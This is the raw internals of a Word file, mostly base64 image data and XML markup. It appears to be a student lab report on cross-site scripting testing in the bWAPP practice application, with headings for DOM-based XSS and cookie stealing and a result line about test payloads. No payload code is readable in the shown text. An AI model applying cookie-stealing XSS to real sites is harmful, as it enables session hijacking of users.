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&#10;AAAACI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OCVXTsQAAAAABC0P/UixRG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nWG5igAAIABJREFU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LNrBwIAAAAAgvanXqQ4Ag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Bgdu1AAAAAAEDQ&#10;/tSLFEc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CyN7O8AAAgAElEQVQ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MyuHQgAAAAACNqf&#10;epHiC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SC2bUDAQAAAABB+1MvUhwB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JzVO78AACAASURBV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s2sHAgAAAACC9qdepDgC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weFplAAADktJREFU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OD27hAnYiiAougdmIBBIHGMYv+LQbEBLBZCGAwk&#10;0zqa/iJ6TtKkX70u4KYf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&#10;bC5yZWxzUEsFBgAAAAAIAAgAAgIAAMPuAQAAAA==&#10;">
                <v:shape id="Image 8" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:11307;top:10240;width:47941;height:25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tP/vQAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0P+A/hCu5sakGRahQRCq4GfCxcXptrW2xuYhNt5+/NQpjl4bzX28G04k2dbywrmCUpCOLS6oYr&#10;BZdzMV2C8AFZY2uZFPyRh+1m9LPGXNuej/Q+hUrEEPY5KqhDcLmUvqzJoE+sI47c3XYGQ4RdJXWH&#10;fQw3rczSdCENNhwbanS0r6l8nF5GgXPL39Lc7Dy9N89eZociw2uh1GQ87FYgAg3hX/x1H7SCuDVe&#10;iTdAbj4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAAAAAA&#10;AAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+vbT/70AAADaAAAADwAAAAAAAAAA&#10;AAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPECAAAAAA==&#10;">
                  <v:imagedata r:id="rId14" o:title=""/>
                </v:shape>
                <v:shape id="Image 9" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:11307;top:41707;width:47722;height:23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eLuwgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RisIw&#10;FETfhf2HcBd8EZuuoqy1URZREXyxbj/g0lzbYnNTmqj1742wsI/DzJxh0nVvGnGnztWWFXxFMQji&#10;wuqaSwX57278DcJ5ZI2NZVLwJAfr1ccgxUTbB2d0P/tSBAi7BBVU3reJlK6oyKCLbEscvIvtDPog&#10;u1LqDh8Bbho5ieO5NFhzWKiwpU1FxfV8Mwr2x6w5jBznW23y7fO0mM4mMSs1/Ox/liA89f4//Nc+&#10;aAULeF8JN0CuXgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCEBeLuwgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;">
                  <v:imagedata r:id="rId15" o:title=""/>
                </v:shape>
                <v:shape id="Image 10" o:spid="_x0000_s1029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PzywgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasNA&#10;DETvhfzDokBvzdothNTJxphAi2nJIWk+QHgV28SrNd6t7fx9dCj0JjGjmaddPrtOjTSE1rOBdJWA&#10;Iq68bbk2cPn5eNmAChHZYueZDNwpQL5fPO0ws37iE43nWCsJ4ZChgSbGPtM6VA05DCvfE4t29YPD&#10;KOtQazvgJOGu069JstYOW5aGBns6NFTdzr/OANu2eP8qHX/q77d44dDpcEyNeV7OxRZUpDn+m/+u&#10;Syv4Qi+/yAB6/wAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAdqPzywgAAANs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bookmarkStart w:id="8" w:name="3._DOM-XSS"/>
      <w:bookmarkStart w:id="9" w:name="RESULT:"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DOM-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D08143" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FBB112" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C4CF31" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234D4180" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D695E7" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7441A6EA" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15AD63B5" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D6E49B" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0CDD95" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9D7DB6" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36EC8E21" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1547C1" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476E80B1" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754BEE60" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D04BE2D" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="274"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A00B45E" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="744"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cookie-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stealing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481442E7" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C578011" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D8F872" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C01950" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7597DB1D" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBDEB8F" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A02A8E3" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3315E16F" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69763869" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775F1338" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15714DF2" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C80778" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D3562B" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709D85B6" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F8C01" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="144" w:line="282" w:lineRule="exact"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thus, the Reflected XSS, Stored XSS, and DOM-based XSS vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634AE9FD" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t>successfully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bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerable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 JavaScript test payloads.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00953AA4">
      <w:pgSz w:w="11910" w:h="16850"/>
      <w:pgMar w:top="16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EC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23B64C0A"/>
    <w:lvl w:ilvl="0" w:tplc="7402CBA0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="744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1E6532">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="999" w:hanging="255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E6A93A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1928" w:hanging="255"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C206EE44">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2857" w:hanging="255"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4F6EB1C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
